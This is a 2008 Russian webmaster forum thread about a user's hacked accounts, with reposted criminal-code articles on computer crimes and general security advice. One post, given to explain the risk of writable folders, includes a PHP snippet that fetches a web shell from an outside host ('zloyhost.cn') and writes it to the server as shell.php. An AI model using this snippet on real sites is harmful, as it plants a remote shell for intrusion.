Вернуться   Форум SAPE.RU > Другое > Курилка

-->
Ответ
 
Опции темы
Старый 17.07.2008, 17:37   #41
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

RedPage, это упражнение для развития близорукости?
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 17.07.2008, 17:40   #42
Эксперт
 
Аватар для RedPage
 
Регистрация: 23.11.2007
Адрес: Туда ведут благие намерения...
Сообщений: 1,280
Вес репутации: 323
RedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущееRedPage - прекрасное будущее
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
RedPage, это упражнение для развития близорукости?
Я сам не ожидал, что ее подрежут. Вот текст:

Ст. 272 ч. 1
Неправомерный доступ к охраняемой законом компьютерной информации, т.е. информации на машинном носителе, в ЭВМ, системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети

Санкция:
штраф в размере от 200 до 500 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 2 до 5 месяцев, либо исправительными работами на срок от 6 месяцев до 1 года, либо лишение свободы на срок до 2 лет

Ст. 272 ч. 2
Те же деяния, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети

Санкция:
штраф в размере от 500 до 800 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 5 до 8 месяцев, либо исправительными работами на срок от 1 года до 2 лет, либо арестом на срок от 3 до 6 месяцев, либо лишение свободы на срок до 5 лет

Ст. 273 ч. 1
Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к незаконному уничтожению, блокированию, модификации либо копированию, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами

Санкция:
Лишение свободы на срок до 3 лет со штрафом в размере от 200 до 500 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 2 до 5 месяцев

Ст. 273 ч. 2
Те же деяния, повлекшие по неосторожности тяжкие последствия
Санкция:
лишение свободы на срок от 3 до 7 лет

Ст. 274 ч. 1
Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, ситеме ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред
Санкция:
лишение права занимать определенные должности или заниматься определенной деятельностью на срок до 5 лет, либо обязательными работами на срок от 180 до 240 часов, либо ограничением свободы на срок до 2 лет

Ст. 274 ч. 2
То же деяние, повлекшее по неосторожности тяжкие последствия
Санкция:
лишение свободы на срок до 4 лет
RedPage вне форума   Ответить с цитированием
Старый 17.07.2008, 20:49   #43
Специалист
 
Аватар для dva-main
 
Регистрация: 27.01.2008
Адрес: Москва
Сообщений: 403
Вес репутации: 206
dva-main скоро станет известен
По умолчанию

http://www.cnews.ru/news/top/index.s...8/07/17/308752
dva-main вне форума   Ответить с цитированием
Старый 17.07.2008, 21:34   #44
Мастер
 
Регистрация: 14.10.2007
Сообщений: 666
Вес репутации: 224
omsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордится
По умолчанию

Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
причем тут это то?
хакер узнал мои пароли от мыла, от сапы, от хостинга, узнал все мои сайты, телефон, узнал что даже девушка у меня есть и то, что она в больнице лежит... да все узнал...

в том то и дело, что привязка по ИП ничего не даст - если кто-то захочет - ломанет....

и не таких ломали... бизнесменов у которых миллиарды долларов в интернете и супер защиты, да и то русские хакеры ломали и заключали многомилионные сделки от их лица...

так что ничего не поможет, а ФАК - для ламаков написан...
вы себя ставите в линейку "таких же как бизнесменов у которых миллиарды долларов в интернете и супер защиты" ???

нет? ну тогда тупо фаервол вас спасет. в том числе от пароля на pop3 ( потча в простонародье) если вы в состоянии его иметь на собственном mx серваке а не на левохареде ,
а если, будучи в линейке миллиардеров в интернете, не в состоянии потратить 5 баксов на хотябы vds то вас ничего не спасет
тут еще ни одного мультимиллиардера от сапару не слямзили пароль на саппу и на почту и не слили 10 долларей со счета сапы.

Добавлено через 9 минут
Цитата:
Сообщение от RedPage Посмотреть сообщение
Я сам не ожидал, что ее подрежут. Вот текст:

Ст. 272 ч. 1
Неправомерный доступ к охраняемой законом компьютерной информации, т.е. информации на машинном носителе, в ЭВМ, системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети

Санкция:
штраф в размере от 200 до 500 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 2 до 5 месяцев, либо исправительными работами на срок от 6 месяцев до 1 года, либо лишение свободы на срок до 2 лет

Ст. 272 ч. 2
Те же деяния, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети

Санкция:
штраф в размере от 500 до 800 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 5 до 8 месяцев, либо исправительными работами на срок от 1 года до 2 лет, либо арестом на срок от 3 до 6 месяцев, либо лишение свободы на срок до 5 лет

Ст. 273 ч. 1
Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к незаконному уничтожению, блокированию, модификации либо копированию, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами

Санкция:
Лишение свободы на срок до 3 лет со штрафом в размере от 200 до 500 минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от 2 до 5 месяцев

Ст. 273 ч. 2
Те же деяния, повлекшие по неосторожности тяжкие последствия
Санкция:
лишение свободы на срок от 3 до 7 лет

Ст. 274 ч. 1
Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, ситеме ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред
Санкция:
лишение права занимать определенные должности или заниматься определенной деятельностью на срок до 5 лет, либо обязательными работами на срок от 180 до 240 часов, либо ограничением свободы на срок до 2 лет

Ст. 274 ч. 2
То же деяние, повлекшее по неосторожности тяжкие последствия
Санкция:
лишение свободы на срок до 4 лет
ну сломают вас в гандурского ипа. и что, саммый гуманный суд поедет в гондурас ловить хакера?

Добавлено через 6 минут
Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
причем тут это то?
хакер узнал мои пароли от мыла, от сапы, от хостинга, узнал все мои сайты, телефон, узнал что даже девушка у меня есть и то, что она в больнице лежит... да все узнал...

в том то и дело, что привязка по ИП ничего не даст - если кто-то захочет - ломанет....

и не таких ломали... бизнесменов у которых миллиарды долларов в интернете и супер защиты, да и то русские хакеры ломали и заключали многомилионные сделки от их лица...

так что ничего не поможет, а ФАК - для ламаков написан...
Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
причем тут это то?
хакер узнал мои пароли от мыла, от сапы, от хостинга, узнал все мои сайты, телефон, узнал что даже девушка у меня есть и то, что она в больнице лежит... да все узнал...
.
Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
в том то и дело, что привязка по ИП ничего не даст - если кто-то захочет - ломанет....
.
чо правда ????????????????? напишите сапеРу пост в форуме от "имени моего IP", еще на майнлинке, где у меня привязка по ИП и есть куча бабла на счете попробуйте его забрать.
я понимаю, многие на досуге читают хаксперРуфорум , но повторю - подделки ипа (кроме флуда) не настолько тривиальны, не один знающий не поведется на мелочевку на счетах "О" . только тупо слив пароль и продав его на всем известным форуме.

поэтому https +vpn+ блок по ИП в саперу и фаер на ссш и отсутствие фитипи на дедикейте как класса на сей момент реально работает
Хотя и ломается. но уже не просто от скуки кем попало.
шаред хостинги под проекты приносящие бабло - это нонсенс. или садамазахизм. вспоминая валуехост с его 60К сломанными одной строкой в 140 симоволов акками - как вообще можно на общественном хостинге хранить важную инфу?

с почтой - не можете сделать себе ящик на собственной машине - берите ящик на гугле - ломают его на порядок режде особенно сслевской подклюючение, и даже не на порядок! за ломаниее ссл бабосов было предложено Официально просто тупо камаз набитый купюрами - что-то не слышал я чтобы отснифали и ссль. да, демона ломали - но чтоб расшифровывали трафф с правильно (не как в неком сервисе) подписанным в удостоверяющем центре сертификатом, который пред вводом пароля можно в общем то и посмотреть, и выдергивали с него пароль - такого не слышал точно.

так что про бред - это на форуме античата.ру нада писать, там оценят, а тут не стоит, лишнее это.


Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
и не таких ломали... бизнесменов у которых миллиарды долларов в интернете и супер защиты, да и то русские хакеры ломали и заключали многомилионные сделки от их лица...

так что ничего не поможет, а ФАК - для ламаков написан...
вы себя ставите в линейку "таких же как бизнесменов у которых миллиарды долларов в интернете и супер защиты" ???

нет? ну тогда тупо фаервол вас спасет. в том числе от пароля на pop3 ( потча в простонародье) если вы в состоянии его иметь на собственном mx серваке а не на левохареде ,
а если, будучи в линейке миллиардеров в интернете, не в состоянии потратить 5 баксов на хотябы vds то вас ничего не спасет
тут еще ни одного мультимиллиардера от сапару не слямзили пароль на саппу и на почту и не слили 10 долларей со счета сапы.

можете побаловаться\потренироваться и "сломать" мой пароль на сапаРу, с которым я хожу на саперу по https что бы понять - что за 10 бакинских это никому не нужно при условии что вы сами его где то не засветили.
а за серьезные деньги смейканая сеть защит не пробиваема для дилетантов. а для не делетантов -и наса ломается.

Последний раз редактировалось omsknews; 17.07.2008 в 21:34. Причина: Добавлено сообщение
omsknews вне форума   Ответить с цитированием
Старый 17.07.2008, 21:34   #45
пусто
 
Аватар для Администрация 6-ой палаты
 
Регистрация: 28.10.2007
Сообщений: 3,115
Вес репутации: 370
Администрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущееАдминистрация 6-ой палаты - прекрасное будущее
По умолчанию

omsknews, я также утверждал как и ты, пока не убедился в обратном...

в том то и дело... удтверждать все могут сколько угодно, пока сами на себе не испытают!

МОДЕРАТОРЫ, ЗАКРОЙТЕ ЭТУ ТЕМУ! а лучше удалите
все равно не ответа, не привета...
__________________
Умное лицо - это еще не признак ума господа. Все глупости на земле делаются именно с этим выражением лица. Улыбайтесь господа, улыбайтесь.
Администрация 6-ой палаты вне форума   Ответить с цитированием
Старый 17.07.2008, 22:27   #46
Мастер
 
Регистрация: 14.10.2007
Сообщений: 666
Вес репутации: 224
omsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордится
По умолчанию

Цитата:
Сообщение от Администрация 6-ой палаты Посмотреть сообщение
omsknews, я также утверждал как и ты, пока не убедился в обратном...

в том то и дело... удтверждать все могут сколько угодно, пока сами на себе не испытают!

МОДЕРАТОРЫ, ЗАКРОЙТЕ ЭТУ ТЕМУ! а лучше удалите
все равно не ответа, не привета...
я до сих пор утверждаю, что ссл от меня до сапару не ломаемый.
omsknews вне форума   Ответить с цитированием
Старый 18.07.2008, 12:03   #47
Новичок
 
Регистрация: 15.07.2008
Сообщений: 2
Вес репутации: 0
Zloyz скоро станет известен
По умолчанию

жесть, права 777 на папку сапы сами по себе никакой опасности не могут нести, опасность может нести только код используемого движка, или доступ в админ-часть движка используемого на сайте. Скажем в движке имеется возможность выполнения пхп-кода, тогда создается пхп блок примерно следующего содержания:
<?
$shell=file_get_contents("http://zloyhost.cn/shels/shell.txt");
file_put_contents("/тут_идет_адрес_папки_с_правами777_на_сервере/shell.php",$shell);
?>
посредством которого заливается тот-же с99 или любой другой пхп шелл
но, опять таки исполнятся он будет с правами апача (т.е.) ноубоди, ни чмод на файлах\папках созданых под пользователем фтп, ни изменять не сможет.
это к примеру.. права 777 дают возможность писать в папку скриптам.. и не более того, из вне (т.е. просто со своего компа залить шел или изменить скрипт нельзя)
А уж утечка паролей от админки\фтп или еще что... это как говорится на совести сайтостроителя... и ни сапа ни права на папку 777 тут непричем.
Фактически права 777 на папку нужны для создания скриптом файла links.db и всё, и никакой опасности сами по себе не несут. Про IP адреса ботов вообще если чесно бред полный... если на папку саппы ограничивать доступ по ip в хтакцесе, так туда никто и не ходит... скрипт выполняется на сервере (sape.php) когда выполняется код отображения ссылок, и именно скрипт изменяет файл с линками а не роботы, еще раз скажу что в папку с парвами 777 может писать ТОЛЬКО пользователь сервера (фтп юзверь, скрипты) но никак не полльзователь извне. а если на весь сайт ввести блокировку ипов отличных от роботов саппы, то на сайт вообще никто не зайдет-) поэтому резюмируя весь сумбурный текст, IP адреса роботов Вам ничего не дадут, и зная их Вы никак не повысите безопасность своего сайта. В первую очередь защишайте домашний комп, т.к. его затроянить гораздо проше чем ломануть веб-сервер.
Zloyz вне форума   Ответить с цитированием
Старый 16.08.2008, 16:25   #48
Специалист
 
Регистрация: 26.01.2007
Сообщений: 334
Вес репутации: 226
msk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордитсяmsk01 - за этого человека можно гордится
По умолчанию

Как-то слабо этот форум называется "курилка". Такие темы должны лежать в форуме "Кунсткамера". Уровень современного вебмастера (я не про ТС, я про остальных отвечающих) просто шокирует.
msk01 вне форума   Ответить с цитированием
Старый 16.08.2008, 16:59   #49
Мастер
 
Регистрация: 14.10.2007
Сообщений: 666
Вес репутации: 224
omsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордитсяomsknews - за этого человека можно гордится
По умолчанию

Цитата:
Сообщение от msk01 Посмотреть сообщение
Как-то слабо этот форум называется "курилка". Такие темы должны лежать в форуме "Кунсткамера". Уровень современного вебмастера (я не про ТС, я про остальных отвечающих) просто шокирует.
правда? и что шокировало в моем ответе месячной давности например? ну я же не ТС, я из этих.. из "других" ..
Вы в лет ломаете ссл проходящий мимо вашего эзернета?

с такими знаниями ссылками торговать? миллиона баксов в меяц наверное, мало и без денег от продажи ссылок не комфортно ?
omsknews вне форума   Ответить с цитированием
Старый 16.08.2008, 17:12   #50
Особый статус
 
Регистрация: 23.03.2008
Адрес: localhost
Сообщений: 2,594
Вес репутации: 322
Ufaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущееUfaweb - прекрасное будущее
Отправить сообщение для Ufaweb с помощью ICQ
По умолчанию

Цитата:
Сообщение от Zloyz Посмотреть сообщение
file_put_contents("/тут_идет_адрес_папки_с_правами777_на_сервере/shell.php",$shell);
бьюсь об стену в Паркенсоне...
Ufaweb вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Анфисе про Хакеров :) D.iK.iJ Курилка 10 10.05.2008 18:07
404 Not Found - Необходимо вылечить. TARANTYL Ошибки при работе с системой 4 02.04.2008 16:15
Необходимо поменять URL для ссылок. nevermore Вопросы от новичков 2 03.03.2008 13:45
Уважаемая администрация, когда же будет нормальная проверка пузомерок, а именно PR? Администрация 6-ой палаты Вопросы по работе системы 1 16.01.2008 07:32
Способы защиты контента от копирования. Lesnik59 Курилка 25 16.07.2007 09:47


Часовой пояс GMT +3, время: 08:57.